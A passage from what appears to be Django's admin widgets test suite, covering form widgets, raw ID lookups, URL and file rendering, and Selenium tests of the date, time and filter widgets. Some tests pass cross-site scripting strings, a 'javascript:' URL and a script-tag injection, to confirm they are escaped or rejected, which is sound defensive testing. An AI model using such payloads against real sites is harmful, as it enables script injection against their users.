ma = MemberAdmin(Member, admin.site)
f1 = ma.formfield_for_dbfield(Member._meta.get_field('birthdate'), request=None)
self.assertIsInstance(f1.widget, widgets.AdminSplitDateTime)
self.assertIsInstance(f1, forms.SplitDateTimeField)
def test_formfield_overrides_for_custom_field(self):
"""
formfield_overrides works for a custom field class.
"""
class AlbumAdmin(admin.ModelAdmin):
formfield_overrides = {MyFileField: {'widget': forms.TextInput()}}
ma = AlbumAdmin(Member, admin.site)
f1 = ma.formfield_for_dbfield(Album._meta.get_field('backside_art'), request=None)
self.assertIsInstance(f1.widget, forms.TextInput)
def test_field_with_choices(self):
self.assertFormfield(Member, 'gender', forms.Select)
def test_choices_with_radio_fields(self):
self.assertFormfield(Member, 'gender', widgets.AdminRadioSelect,
radio_fields={'gender': admin.VERTICAL})
def test_inheritance(self):
self.assertFormfield(Album, 'backside_art', widgets.AdminFileWidget)
def test_m2m_widgets(self):
"""m2m fields help text as it applies to admin app (#9321)."""
class AdvisorAdmin(admin.ModelAdmin):
filter_vertical = ['companies']
self.assertFormfield(Advisor, 'companies', widgets.FilteredSelectMultiple,
filter_vertical=['companies'])
ma = AdvisorAdmin(Advisor, admin.site)
f = ma.formfield_for_dbfield(Advisor._meta.get_field('companies'), request=None)
self.assertEqual(
f.help_text,
'Hold down “Control”, or “Command” on a Mac, to select more than one.'
)
@override_settings(ROOT_URLCONF='admin_widgets.urls')
class AdminFormfieldForDBFieldWithRequestTests(TestDataMixin, TestCase):
def test_filter_choices_by_request_user(self):
"""
Ensure the user can only see their own cars in the foreign key dropdown.
"""
self.client.force_login(self.superuser)
response = self.client.get(reverse('admin:admin_widgets_cartire_add'))
self.assertNotContains(response, "BMW M3")
self.assertContains(response, "Volkswagen Passat")
@override_settings(ROOT_URLCONF='admin_widgets.urls')
class AdminForeignKeyWidgetChangeList(TestDataMixin, TestCase):
def setUp(self):
self.client.force_login(self.superuser)
def test_changelist_ForeignKey(self):
response = self.client.get(reverse('admin:admin_widgets_car_changelist'))
self.assertContains(response, '/auth/user/add/')
@override_settings(ROOT_URLCONF='admin_widgets.urls')
class AdminForeignKeyRawIdWidget(TestDataMixin, TestCase):
def setUp(self):
self.client.force_login(self.superuser)
def test_nonexistent_target_id(self):
band = Band.objects.create(name='Bogey Blues')
pk = band.pk
band.delete()
post_data = {
"main_band": str(pk),
}
# Try posting with a nonexistent pk in a raw id field: this
# should result in an error message, not a server exception.
response = self.client.post(reverse('admin:admin_widgets_event_add'), post_data)
self.assertContains(response, 'Select a valid choice. That choice is not one of the available choices.')
def test_invalid_target_id(self):
for test_str in ('Iñtërnâtiônàlizætiøn', "1234'", -1234):
# This should result in an error message, not a server exception.
response = self.client.post(reverse('admin:admin_widgets_event_add'), {"main_band": test_str})
self.assertContains(response, 'Select a valid choice. That choice is not one of the available choices.')
def test_url_params_from_lookup_dict_any_iterable(self):
lookup1 = widgets.url_params_from_lookup_dict({'color__in': ('red', 'blue')})
lookup2 = widgets.url_params_from_lookup_dict({'color__in': ['red', 'blue']})
self.assertEqual(lookup1, {'color__in': 'red,blue'})
self.assertEqual(lookup1, lookup2)
def test_url_params_from_lookup_dict_callable(self):
def my_callable():
return 'works'
lookup1 = widgets.url_params_from_lookup_dict({'myfield': my_callable})
lookup2 = widgets.url_params_from_lookup_dict({'myfield': my_callable()})
self.assertEqual(lookup1, lookup2)
def test_label_and_url_for_value_invalid_uuid(self):
field = Bee._meta.get_field('honeycomb')
self.assertIsInstance(field.target_field, UUIDField)
widget = widgets.ForeignKeyRawIdWidget(field.remote_field, admin.site)
self.assertEqual(widget.label_and_url_for_value('invalid-uuid'), ('', ''))
class FilteredSelectMultipleWidgetTest(SimpleTestCase):
def test_render(self):
# Backslash in verbose_name to ensure it is JavaScript escaped.
w = widgets.FilteredSelectMultiple('test\\', False)
self.assertHTMLEqual(
w.render('test', 'test'),
'<select multiple name="test" class="selectfilter" '
'data-field-name="test\\" data-is-stacked="0">\n</select>'
)
def test_stacked_render(self):
# Backslash in verbose_name to ensure it is JavaScript escaped.
w = widgets.FilteredSelectMultiple('test\\', True)
self.assertHTMLEqual(
w.render('test', 'test'),
'<select multiple name="test" class="selectfilterstacked" '
'data-field-name="test\\" data-is-stacked="1">\n</select>'
)
class AdminDateWidgetTest(SimpleTestCase):
def test_attrs(self):
w = widgets.AdminDateWidget()
self.assertHTMLEqual(
w.render('test', datetime(2007, 12, 1, 9, 30)),
'<input value="2007-12-01" type="text" class="vDateField" name="test" size="10">',
)
# pass attrs to widget
w = widgets.AdminDateWidget(attrs={'size': 20, 'class': 'myDateField'})
self.assertHTMLEqual(
w.render('test', datetime(2007, 12, 1, 9, 30)),
'<input value="2007-12-01" type="text" class="myDateField" name="test" size="20">',
)
class AdminTimeWidgetTest(SimpleTestCase):
def test_attrs(self):
w = widgets.AdminTimeWidget()
self.assertHTMLEqual(
w.render('test', datetime(2007, 12, 1, 9, 30)),
'<input value="09:30:00" type="text" class="vTimeField" name="test" size="8">',
)
# pass attrs to widget
w = widgets.AdminTimeWidget(attrs={'size': 20, 'class': 'myTimeField'})
self.assertHTMLEqual(
w.render('test', datetime(2007, 12, 1, 9, 30)),
'<input value="09:30:00" type="text" class="myTimeField" name="test" size="20">',
)
class AdminSplitDateTimeWidgetTest(SimpleTestCase):
def test_render(self):
w = widgets.AdminSplitDateTime()
self.assertHTMLEqual(
w.render('test', datetime(2007, 12, 1, 9, 30)),
'<p class="datetime">'
'Date: <input value="2007-12-01" type="text" class="vDateField" '
'name="test_0" size="10"><br>'
'Time: <input value="09:30:00" type="text" class="vTimeField" '
'name="test_1" size="8"></p>'
)
def test_localization(self):
w = widgets.AdminSplitDateTime()
with translation.override('de-at'):
w.is_localized = True
self.assertHTMLEqual(
w.render('test', datetime(2007, 12, 1, 9, 30)),
'<p class="datetime">'
'Datum: <input value="01.12.2007" type="text" '
'class="vDateField" name="test_0"size="10"><br>'
'Zeit: <input value="09:30:00" type="text" class="vTimeField" '
'name="test_1" size="8"></p>'
)
class AdminURLWidgetTest(SimpleTestCase):
def test_get_context_validates_url(self):
w = widgets.AdminURLFieldWidget()
for invalid in ['', '/not/a/full/url/', 'javascript:alert("Danger XSS!")']:
with self.subTest(url=invalid):
self.assertFalse(w.get_context('name', invalid, {})['url_valid'])
self.assertTrue(w.get_context('name', 'http://example.com', {})['url_valid'])
def test_render(self):
w = widgets.AdminURLFieldWidget()
self.assertHTMLEqual(
w.render('test', ''),
'<input class="vURLField" name="test" type="url">'
)
self.assertHTMLEqual(
w.render('test', 'http://example.com'),
'<p class="url">Currently:<a href="http://example.com">'
'http://example.com</a><br>'
'Change:<input class="vURLField" name="test" type="url" '
'value="http://example.com"></p>'
)
def test_render_idn(self):
w = widgets.AdminURLFieldWidget()
self.assertHTMLEqual(
w.render('test', 'http://example-äüö.com'),
'<p class="url">Currently: <a href="http://xn--example--7za4pnc.com">'
'http://example-äüö.com</a><br>'
'Change:<input class="vURLField" name="test" type="url" '
'value="http://example-äüö.com"></p>'
)
def test_render_quoting(self):
"""
WARNING: This test doesn't use assertHTMLEqual since it will get rid
of some escapes which are tested here!
"""
HREF_RE = re.compile('href="([^"]+)"')
VALUE_RE = re.compile('value="([^"]+)"')
TEXT_RE = re.compile('<a[^>]+>([^>]+)</a>')
w = widgets.AdminURLFieldWidget()
output = w.render('test', 'http://example.com/<sometag>some-text</sometag>')
self.assertEqual(
HREF_RE.search(output)[1],
'http://example.com/%3Csometag%3Esome-text%3C/sometag%3E',
)
self.assertEqual(
TEXT_RE.search(output)[1],
'http://example.com/<sometag>some-text</sometag>',
)
self.assertEqual(
VALUE_RE.search(output)[1],
'http://example.com/<sometag>some-text</sometag>',
)
output = w.render('test', 'http://example-äüö.com/<sometag>some-text</sometag>')
self.assertEqual(
HREF_RE.search(output)[1],
'http://xn--example--7za4pnc.com/%3Csometag%3Esome-text%3C/sometag%3E',
)
self.assertEqual(
TEXT_RE.search(output)[1],
'http://example-äüö.com/<sometag>some-text</sometag>',
)
self.assertEqual(
VALUE_RE.search(output)[1],
'http://example-äüö.com/<sometag>some-text</sometag>',
)
output = w.render('test', 'http://www.example.com/%C3%A4"><script>alert("XSS!")</script>"')
self.assertEqual(
HREF_RE.search(output)[1],
'http://www.example.com/%C3%A4%22%3E%3Cscript%3Ealert(%22XSS!%22)%3C/script%3E%22',
)
self.assertEqual(
TEXT_RE.search(output)[1],
'http://www.example.com/%C3%A4"><script>'
'alert("XSS!")</script>"'
)
self.assertEqual(
VALUE_RE.search(output)[1],
'http://www.example.com/%C3%A4"><script>alert("XSS!")</script>"',
)
class AdminUUIDWidgetTests(SimpleTestCase):
def test_attrs(self):
w = widgets.AdminUUIDInputWidget()
self.assertHTMLEqual(
w.render('test', '550e8400-e29b-41d4-a716-446655440000'),
'<input value="550e8400-e29b-41d4-a716-446655440000" type="text" class="vUUIDField" name="test">',
)
w = widgets.AdminUUIDInputWidget(attrs={'class': 'myUUIDInput'})
self.assertHTMLEqual(
w.render('test', '550e8400-e29b-41d4-a716-446655440000'),
'<input value="550e8400-e29b-41d4-a716-446655440000" type="text" class="myUUIDInput" name="test">',
)
@override_settings(ROOT_URLCONF='admin_widgets.urls')
class AdminFileWidgetTests(TestDataMixin, TestCase):
@classmethod
def setUpTestData(cls):
super().setUpTestData()
band = Band.objects.create(name='Linkin Park')
cls.album = band.album_set.create(
name='Hybrid Theory', cover_art=r'albums\hybrid_theory.jpg'
)
def test_render(self):
w = widgets.AdminFileWidget()
self.assertHTMLEqual(
w.render('test', self.album.cover_art),
'<p class="file-upload">Currently: <a href="%(STORAGE_URL)salbums/'
r'hybrid_theory.jpg">albums\hybrid_theory.jpg</a> '
'<span class="clearable-file-input">'
'<input type="checkbox" name="test-clear" id="test-clear_id"> '
'<label for="test-clear_id">Clear</label></span><br>'
'Change: <input type="file" name="test"></p>' % {
'STORAGE_URL': default_storage.url(''),
},
)
self.assertHTMLEqual(
w.render('test', SimpleUploadedFile('test', b'content')),
'<input type="file" name="test">',
)
def test_render_required(self):
widget = widgets.AdminFileWidget()
widget.is_required = True
self.assertHTMLEqual(
widget.render('test', self.album.cover_art),
'<p class="file-upload">Currently: <a href="%(STORAGE_URL)salbums/'
r'hybrid_theory.jpg">albums\hybrid_theory.jpg</a><br>'
'Change: <input type="file" name="test"></p>' % {
'STORAGE_URL': default_storage.url(''),
},
)
def test_render_disabled(self):
widget = widgets.AdminFileWidget(attrs={'disabled': True})
self.assertHTMLEqual(
widget.render('test', self.album.cover_art),
'<p class="file-upload">Currently: <a href="%(STORAGE_URL)salbums/'
r'hybrid_theory.jpg">albums\hybrid_theory.jpg</a> '
'<span class="clearable-file-input">'
'<input type="checkbox" name="test-clear" id="test-clear_id" disabled>'
'<label for="test-clear_id">Clear</label></span><br>'
'Change: <input type="file" name="test" disabled></p>' % {
'STORAGE_URL': default_storage.url(''),
},
)
def test_readonly_fields(self):
"""
File widgets should render as a link when they're marked "read only."
"""
self.client.force_login(self.superuser)
response = self.client.get(reverse('admin:admin_widgets_album_change', args=(self.album.id,)))
self.assertContains(
response,
'<div class="readonly"><a href="%(STORAGE_URL)salbums/hybrid_theory.jpg">'
r'albums\hybrid_theory.jpg</a></div>' % {'STORAGE_URL': default_storage.url('')},
html=True,
)
self.assertNotContains(
response,
'<input type="file" name="cover_art" id="id_cover_art">',
html=True,
)
response = self.client.get(reverse('admin:admin_widgets_album_add'))
self.assertContains(
response,
'<div class="readonly"></div>',
html=True,
)
@override_settings(ROOT_URLCONF='admin_widgets.urls')
class ForeignKeyRawIdWidgetTest(TestCase):
def test_render(self):
band = Band.objects.create(name='Linkin Park')
band.album_set.create(
name='Hybrid Theory', cover_art=r'albums\hybrid_theory.jpg'
)
rel = Album._meta.get_field('band').remote_field
w = widgets.ForeignKeyRawIdWidget(rel, widget_admin_site)
self.assertHTMLEqual(
w.render('test', band.uuid, attrs={}),
'<input type="text" name="test" value="%(banduuid)s" '
'class="vForeignKeyRawIdAdminField">'
'<a href="/admin_widgets/band/?_to_field=uuid" class="related-lookup" '
'id="lookup_id_test" title="Lookup"></a> <strong>'
'<a href="/admin_widgets/band/%(bandpk)s/change/">Linkin Park</a>'
'</strong>' % {'banduuid': band.uuid, 'bandpk': band.pk}
)
def test_relations_to_non_primary_key(self):
# ForeignKeyRawIdWidget works with fields which aren't related to
# the model's primary key.
apple = Inventory.objects.create(barcode=86, name='Apple')
Inventory.objects.create(barcode=22, name='Pear')
core = Inventory.objects.create(
barcode=87, name='Core', parent=apple
)
rel = Inventory._meta.get_field('parent').remote_field
w = widgets.ForeignKeyRawIdWidget(rel, widget_admin_site)
self.assertHTMLEqual(
w.render('test', core.parent_id, attrs={}),
'<input type="text" name="test" value="86" '
'class="vForeignKeyRawIdAdminField">'
'<a href="/admin_widgets/inventory/?_to_field=barcode" '
'class="related-lookup" id="lookup_id_test" title="Lookup"></a>'
' <strong><a href="/admin_widgets/inventory/%(pk)s/change/">'
'Apple</a></strong>' % {'pk': apple.pk}
)
def test_fk_related_model_not_in_admin(self):
# FK to a model not registered with admin site. Raw ID widget should
# have no magnifying glass link. See #16542
big_honeycomb = Honeycomb.objects.create(location='Old tree')
big_honeycomb.bee_set.create()
rel = Bee._meta.get_field('honeycomb').remote_field
w = widgets.ForeignKeyRawIdWidget(rel, widget_admin_site)
self.assertHTMLEqual(
w.render('honeycomb_widget', big_honeycomb.pk, attrs={}),
'<input type="text" name="honeycomb_widget" value="%(hcombpk)s">'
' <strong>%(hcomb)s</strong>'
% {'hcombpk': big_honeycomb.pk, 'hcomb': big_honeycomb}
)
def test_fk_to_self_model_not_in_admin(self):
# FK to self, not registered with admin site. Raw ID widget should have
# no magnifying glass link. See #16542
subject1 = Individual.objects.create(name='Subject #1')
Individual.objects.create(name='Child', parent=subject1)
rel = Individual._meta.get_field('parent').remote_field
w = widgets.ForeignKeyRawIdWidget(rel, widget_admin_site)
self.assertHTMLEqual(
w.render('individual_widget', subject1.pk, attrs={}),
'<input type="text" name="individual_widget" value="%(subj1pk)s">'
' <strong>%(subj1)s</strong>'
% {'subj1pk': subject1.pk, 'subj1': subject1}
)
def test_proper_manager_for_label_lookup(self):
# see #9258
rel = Inventory._meta.get_field('parent').remote_field
w = widgets.ForeignKeyRawIdWidget(rel, widget_admin_site)
hidden = Inventory.objects.create(
barcode=93, name='Hidden', hidden=True
)
child_of_hidden = Inventory.objects.create(
barcode=94, name='Child of hidden', parent=hidden
)
self.assertHTMLEqual(
w.render('test', child_of_hidden.parent_id, attrs={}),
'<input type="text" name="test" value="93" class="vForeignKeyRawIdAdminField">'
'<a href="/admin_widgets/inventory/?_to_field=barcode" '
'class="related-lookup" id="lookup_id_test" title="Lookup"></a>'
' <strong><a href="/admin_widgets/inventory/%(pk)s/change/">'
'Hidden</a></strong>' % {'pk': hidden.pk}
)
def test_render_unsafe_limit_choices_to(self):
rel = UnsafeLimitChoicesTo._meta.get_field('band').remote_field
w = widgets.ForeignKeyRawIdWidget(rel, widget_admin_site)
self.assertHTMLEqual(
w.render('test', None),
'<input type="text" name="test" class="vForeignKeyRawIdAdminField">\n'
'<a href="/admin_widgets/band/?name=%22%26%3E%3Cescapeme&_to_field=artist_ptr" '
'class="related-lookup" id="lookup_id_test" title="Lookup"></a>'
)
def test_render_fk_as_pk_model(self):
rel = VideoStream._meta.get_field('release_event').remote_field
w = widgets.ForeignKeyRawIdWidget(rel, widget_admin_site)
self.assertHTMLEqual(
w.render('test', None),
'<input type="text" name="test" class="vForeignKeyRawIdAdminField">\n'
'<a href="/admin_widgets/releaseevent/?_to_field=album" '
'class="related-lookup" id="lookup_id_test" title="Lookup"></a>'
)
@override_settings(ROOT_URLCONF='admin_widgets.urls')
class ManyToManyRawIdWidgetTest(TestCase):
def test_render(self):
band = Band.objects.create(name='Linkin Park')
m1 = Member.objects.create(name='Chester')
m2 = Member.objects.create(name='Mike')
band.members.add(m1, m2)
rel = Band._meta.get_field('members').remote_field
w = widgets.ManyToManyRawIdWidget(rel, widget_admin_site)
self.assertHTMLEqual(
w.render('test', [m1.pk, m2.pk], attrs={}), (
'<input type="text" name="test" value="%(m1pk)s,%(m2pk)s" class="vManyToManyRawIdAdminField">'
'<a href="/admin_widgets/member/" class="related-lookup" id="lookup_id_test" title="Lookup"></a>'
) % {'m1pk': m1.pk, 'm2pk': m2.pk}
)
self.assertHTMLEqual(
w.render('test', [m1.pk]), (
'<input type="text" name="test" value="%(m1pk)s" class="vManyToManyRawIdAdminField">'
'<a href="/admin_widgets/member/" class="related-lookup" id="lookup_id_test" title="Lookup"></a>'
) % {'m1pk': m1.pk}
)
def test_m2m_related_model_not_in_admin(self):
# M2M relationship with model not registered with admin site. Raw ID
# widget should have no magnifying glass link. See #16542
consultor1 = Advisor.objects.create(name='Rockstar Techie')
c1 = Company.objects.create(name='Doodle')
c2 = Company.objects.create(name='Pear')
consultor1.companies.add(c1, c2)
rel = Advisor._meta.get_field('companies').remote_field
w = widgets.ManyToManyRawIdWidget(rel, widget_admin_site)
self.assertHTMLEqual(
w.render('company_widget1', [c1.pk, c2.pk], attrs={}),
'<input type="text" name="company_widget1" value="%(c1pk)s,%(c2pk)s">' % {'c1pk': c1.pk, 'c2pk': c2.pk}
)
self.assertHTMLEqual(
w.render('company_widget2', [c1.pk]),
'<input type="text" name="company_widget2" value="%(c1pk)s">' % {'c1pk': c1.pk}
)
@override_settings(ROOT_URLCONF='admin_widgets.urls')
class RelatedFieldWidgetWrapperTests(SimpleTestCase):
def test_no_can_add_related(self):
rel = Individual._meta.get_field('parent').remote_field
w = widgets.AdminRadioSelect()
# Used to fail with a name error.
w = widgets.RelatedFieldWidgetWrapper(w, rel, widget_admin_site)
self.assertFalse(w.can_add_related)
def test_select_multiple_widget_cant_change_delete_related(self):
rel = Individual._meta.get_field('parent').remote_field
widget = forms.SelectMultiple()
wrapper = widgets.RelatedFieldWidgetWrapper(
widget, rel, widget_admin_site,
can_add_related=True,
can_change_related=True,
can_delete_related=True,
)
self.assertTrue(wrapper.can_add_related)
self.assertFalse(wrapper.can_change_related)
self.assertFalse(wrapper.can_delete_related)
def test_on_delete_cascade_rel_cant_delete_related(self):
rel = Individual._meta.get_field('soulmate').remote_field
widget = forms.Select()
wrapper = widgets.RelatedFieldWidgetWrapper(
widget, rel, widget_admin_site,
can_add_related=True,
can_change_related=True,
can_delete_related=True,
)
self.assertTrue(wrapper.can_add_related)
self.assertTrue(wrapper.can_change_related)
self.assertFalse(wrapper.can_delete_related)
def test_custom_widget_render(self):
class CustomWidget(forms.Select):
def render(self, *args, **kwargs):
return 'custom render output'
rel = Album._meta.get_field('band').remote_field
widget = CustomWidget()
wrapper = widgets.RelatedFieldWidgetWrapper(
widget, rel, widget_admin_site,
can_add_related=True,
can_change_related=True,
can_delete_related=True,
)
output = wrapper.render('name', 'value')
self.assertIn('custom render output', output)
def test_widget_delegates_value_omitted_from_data(self):
class CustomWidget(forms.Select):
def value_omitted_from_data(self, data, files, name):
return False
rel = Album._meta.get_field('band').remote_field
widget = CustomWidget()
wrapper = widgets.RelatedFieldWidgetWrapper(widget, rel, widget_admin_site)
self.assertIs(wrapper.value_omitted_from_data({}, {}, 'band'), False)
def test_widget_is_hidden(self):
rel = Album._meta.get_field('band').remote_field
widget = forms.HiddenInput()
widget.choices = ()
wrapper = widgets.RelatedFieldWidgetWrapper(widget, rel, widget_admin_site)
self.assertIs(wrapper.is_hidden, True)
context = wrapper.get_context('band', None, {})
self.assertIs(context['is_hidden'], True)
output = wrapper.render('name', 'value')
# Related item links are hidden.
self.assertNotIn('<a ', output)
def test_widget_is_not_hidden(self):
rel = Album._meta.get_field('band').remote_field
widget = forms.Select()
wrapper = widgets.RelatedFieldWidgetWrapper(widget, rel, widget_admin_site)
self.assertIs(wrapper.is_hidden, False)
context = wrapper.get_context('band', None, {})
self.assertIs(context['is_hidden'], False)
output = wrapper.render('name', 'value')
# Related item links are present.
self.assertIn('<a ', output)
@override_settings(ROOT_URLCONF='admin_widgets.urls')
class AdminWidgetSeleniumTestCase(AdminSeleniumTestCase):
available_apps = ['admin_widgets'] + AdminSeleniumTestCase.available_apps
def setUp(self):
self.u1 = User.objects.create_superuser(username='super', password='secret', email='super@example.com')
class DateTimePickerSeleniumTests(AdminWidgetSeleniumTestCase):
def test_show_hide_date_time_picker_widgets(self):
"""
Pressing the ESC key or clicking on a widget value closes the date and
time picker widgets.
"""
from selenium.webdriver.common.keys import Keys
self.admin_login(username='super', password='secret', login_url='/')
# Open a page that has a date and time picker widgets
self.selenium.get(self.live_server_url + reverse('admin:admin_widgets_member_add'))
# First, with the date picker widget ---------------------------------
cal_icon = self.selenium.find_element_by_id('calendarlink0')
# The date picker is hidden
self.assertFalse(self.selenium.find_element_by_id('calendarbox0').is_displayed())
# Click the calendar icon
cal_icon.click()
# The date picker is visible
self.assertTrue(self.selenium.find_element_by_id('calendarbox0').is_displayed())
# Press the ESC key
self.selenium.find_element_by_tag_name('body').send_keys([Keys.ESCAPE])
# The date picker is hidden again
self.assertFalse(self.selenium.find_element_by_id('calendarbox0').is_displayed())
# Click the calendar icon, then on the 15th of current month
cal_icon.click()
self.selenium.find_element_by_xpath("//a[contains(text(), '15')]").click()
self.assertFalse(self.selenium.find_element_by_id('calendarbox0').is_displayed())
self.assertEqual(
self.selenium.find_element_by_id('id_birthdate_0').get_attribute('value'),
datetime.today().strftime('%Y-%m-') + '15',
)
# Then, with the time picker widget ----------------------------------
time_icon = self.selenium.find_element_by_id('clocklink0')
# The time picker is hidden
self.assertFalse(self.selenium.find_element_by_id('clockbox0').is_displayed())
# Click the time icon
time_icon.click()
# The time picker is visible
self.assertTrue(self.selenium.find_element_by_id('clockbox0').is_displayed())
self.assertEqual(
[
x.text for x in
self.selenium.find_elements_by_xpath("//ul[@class='timelist']/li/a")
],
['Now', 'Midnight', '6 a.m.', 'Noon', '6 p.m.']
)
# Press the ESC key
self.selenium.find_element_by_tag_name('body').send_keys([Keys.ESCAPE])
# The time picker is hidden again
self.assertFalse(self.selenium.find_element_by_id('clockbox0').is_displayed())
# Click the time icon, then select the 'Noon' value
time_icon.click()
self.selenium.find_element_by_xpath("//a[contains(text(), 'Noon')]").click()
self.assertFalse(self.selenium.find_element_by_id('clockbox0').is_displayed())
self.assertEqual(
self.selenium.find_element_by_id('id_birthdate_1').get_attribute('value'),
'12:00:00',
)
def test_calendar_nonday_class(self):
"""
Ensure cells that are not days of the month have the `nonday` CSS class.
Refs #4574.
"""
self.admin_login(username='super', password='secret', login_url='/')
# Open a page that has a date and time picker widgets
self.selenium.get(self.live_server_url + reverse('admin:admin_widgets_member_add'))
# fill in the birth date.
self.selenium.find_element_by_id('id_birthdate_0').send_keys('2013-06-01')
# Click the calendar icon
self.selenium.find_element_by_id('calendarlink0').click()
# get all the tds within the calendar
calendar0 = self.selenium.find_element_by_id('calendarin0')
tds = calendar0.find_elements_by_tag_name('td')
# make sure the first and last 6 cells have class nonday
for td in tds[:6] + tds[-6:]:
self.assertEqual(td.get_attribute('class'), 'nonday')
def test_calendar_selected_class(self):
"""
Ensure cell for the day in the input has the `selected` CSS class.
Refs #4574.
"""
self.admin_login(username='super', password='secret', login_url='/')
# Open a page that has a date and time picker widgets
self.selenium.get(self.live_server_url + reverse('admin:admin_widgets_member_add'))
# fill in the birth date.
self.selenium.find_element_by_id('id_birthdate_0').send_keys('2013-06-01')
# Click the calendar icon
self.selenium.find_element_by_id('calendarlink0').click()
# get all the tds within the calendar
calendar0 = self.selenium.find_element_by_id('calendarin0')
tds = calendar0.find_elements_by_tag_name('td')
# verify the selected cell
selected = tds[6]
self.assertEqual(selected.get_attribute('class'), 'selected')
self.assertEqual(selected.text, '1')
def test_calendar_no_selected_class(self):
"""
Ensure no cells are given the selected class when the field is empty.
Refs #4574.
"""
self.admin_login(username='super', password='secret', login_url='/')
# Open a page that has a date and time picker widgets
self.selenium.get(self.live_server_url + reverse('admin:admin_widgets_member_add'))
# Click the calendar icon
self.selenium.find_element_by_id('calendarlink0').click()
# get all the tds within the calendar
calendar0 = self.selenium.find_element_by_id('calendarin0')
tds = calendar0.find_elements_by_tag_name('td')
# verify there are no cells with the selected class
selected = [td for td in tds if td.get_attribute('class') == 'selected']
self.assertEqual(len(selected), 0)
def test_calendar_show_date_from_input(self):
"""
The calendar shows the date from the input field for every locale
supported by Django.
"""
self.selenium.set_window_size(1024, 768)
self.admin_login(username='super', password='secret', login_url='/')
# Enter test data
member = Member.objects.create(name='Bob', birthdate=datetime(1984, 5, 15), gender='M')
# Get month name translations for every locale
month_string = 'May'
path = os.path.join(os.path.dirname(import_module('django.contrib.admin').__file__), 'locale')
for language_code, language_name in settings.LANGUAGES:
try:
catalog = gettext.translation('djangojs', path, [language_code])
except OSError:
continue
if month_string in catalog._catalog:
month_name = catalog._catalog[month_string]
else:
month_name = month_string
# Get the expected caption
may_translation = month_name
expected_caption = '{:s} {:d}'.format(may_translation.upper(), 1984)
# Test with every locale
with override_settings(LANGUAGE_CODE=language_code):
# Open a page that has a date picker widget
url = reverse('admin:admin_widgets_member_change', args=(member.pk,))
self.selenium.get(self.live_server_url + url)
# Click on the calendar icon
self.selenium.find_element_by_id('calendarlink0').click()
# Make sure that the right month and year are displayed
self.wait_for_text('#calendarin0 caption', expected_caption)
@override_settings(TIME_ZONE='Asia/Singapore')
class DateTimePickerShortcutsSeleniumTests(AdminWidgetSeleniumTestCase):
def test_date_time_picker_shortcuts(self):
"""
date/time/datetime picker shortcuts work in the current time zone.
Refs #20663.
This test case is fairly tricky, it relies on selenium still running the browser
in the default time zone "America/Chicago" despite `override_settings` changing
the time zone to "Asia/Singapore".
"""
self.admin_login(username='super', password='secret', login_url='/')
error_margin = timedelta(seconds=10)
# If we are neighbouring a DST, we add an hour of error margin.
tz = pytz.timezone('America/Chicago')
utc_now = datetime.now(pytz.utc)
tz_yesterday = (utc_now - timedelta(days=1)).astimezone(tz).tzname()
tz_tomorrow = (utc_now + timedelta(days=1)).astimezone(tz).tzname()
if tz_yesterday != tz_tomorrow:
error_margin += timedelta(hours=1)
self.selenium.get(self.live_server_url + reverse('admin:admin_widgets_member_add'))
self.selenium.find_element_by_id('id_name').send_keys('test')
# Click on the "today" and "now" shortcuts.
shortcuts = self.selenium.find_elements_by_css_selector('.field-birthdate .datetimeshortcuts')
now = datetime.now()
for shortcut in shortcuts:
shortcut.find_element_by_tag_name('a').click()
# There is a time zone mismatch warning.
# Warning: This would effectively fail if the TIME_ZONE defined in the
# settings has the same UTC offset as "Asia/Singapore" because the
# mismatch warning would be rightfully missing from the page.
self.selenium.find_elements_by_css_selector('.field-birthdate .timezonewarning')
# Submit the form.
with self.wait_page_loaded():
self.selenium.find_element_by_name('_save').click()
# Make sure that "now" in JavaScript is within 10 seconds
# from "now" on the server side.
member = Member.objects.get(name='test')
self.assertGreater(member.birthdate, now - error_margin)
self.assertLess(member.birthdate, now + error_margin)
# The above tests run with Asia/Singapore which are on the positive side of
# UTC. Here we test with a timezone on the negative side.
@override_settings(TIME_ZONE='US/Eastern')
class DateTimePickerAltTimezoneSeleniumTests(DateTimePickerShortcutsSeleniumTests):
pass
class HorizontalVerticalFilterSeleniumTests(AdminWidgetSeleniumTestCase):
def setUp(self):
super().setUp()
self.lisa = Student.objects.create(name='Lisa')
self.john = Student.objects.create(name='John')
self.bob = Student.objects.create(name='Bob')
self.peter = Student.objects.create(name='Peter')
self.jenny = Student.objects.create(name='Jenny')
self.jason = Student.objects.create(name='Jason')
self.cliff = Student.objects.create(name='Cliff')
self.arthur = Student.objects.create(name='Arthur')
self.school = School.objects.create(name='School of Awesome')
def assertActiveButtons(self, mode, field_name, choose, remove, choose_all=None, remove_all=None):
choose_link = '#id_%s_add_link' % field_name
choose_all_link = '#id_%s_add_all_link' % field_name
remove_link = '#id_%s_remove_link' % field_name
remove_all_link = '#id_%s_remove_all_link' % field_name
self.assertEqual(self.has_css_class(choose_link, 'active'), choose)
self.assertEqual(self.has_css_class(remove_link, 'active'), remove)
if mode == 'horizontal':
self.assertEqual(self.has_css_class(choose_all_link, 'active'), choose_all)
self.assertEqual(self.has_css_class(remove_all_link, 'active'), remove_all)
def execute_basic_operations(self, mode, field_name):
original_url = self.selenium.current_url
from_box = '#id_%s_from' % field_name
to_box = '#id_%s_to' % field_name
choose_link = 'id_%s_add_link' % field_name
choose_all_link = 'id_%s_add_all_link' % field_name
remove_link = 'id_%s_remove_link' % field_name
remove_all_link = 'id_%s_remove_all_link' % field_name
# Initial positions ---------------------------------------------------
self.assertSelectOptions(from_box, [
str(self.arthur.id), str(self.bob.id),
str(self.cliff.id), str(self.jason.id),
str(self.jenny.id), str(self.john.id),
])
self.assertSelectOptions(to_box, [str(self.lisa.id), str(self.peter.id)])
self.assertActiveButtons(mode, field_name, False, False, True, True)
# Click 'Choose all' --------------------------------------------------
if mode == 'horizontal':
self.selenium.find_element_by_id(choose_all_link).click()
elif mode == 'vertical':
# There 's no 'Choose all' button in vertical mode, so individually
# select all options and click 'Choose'.
for option in self.selenium.find_elements_by_css_selector(from_box + ' > option'):
option.click()
self.selenium.find_element_by_id(choose_link).click()
self.assertSelectOptions(from_box, [])
self.assertSelectOptions(to_box, [
str(self.lisa.id), str(self.peter.id),
str(self.arthur.id), str(self.bob.id),
str(self.cliff.id), str(self.jason.id),
str(self.jenny.id), str(self.john.id),
])
self.assertActiveButtons(mode, field_name, False, False, False, True)
# Click 'Remove all' --------------------------------------------------
if mode == 'horizontal':
self.selenium.find_element_by_id(remove_all_link).click()
elif mode == 'vertical':
# There 's no 'Remove all' button in vertical mode, so individually
# select all options and click 'Remove'.
for option in self.selenium.find_elements_by_css_selector(to_box + ' > option'):
option.click()
self.selenium.find_element_by_id(remove_link).click()
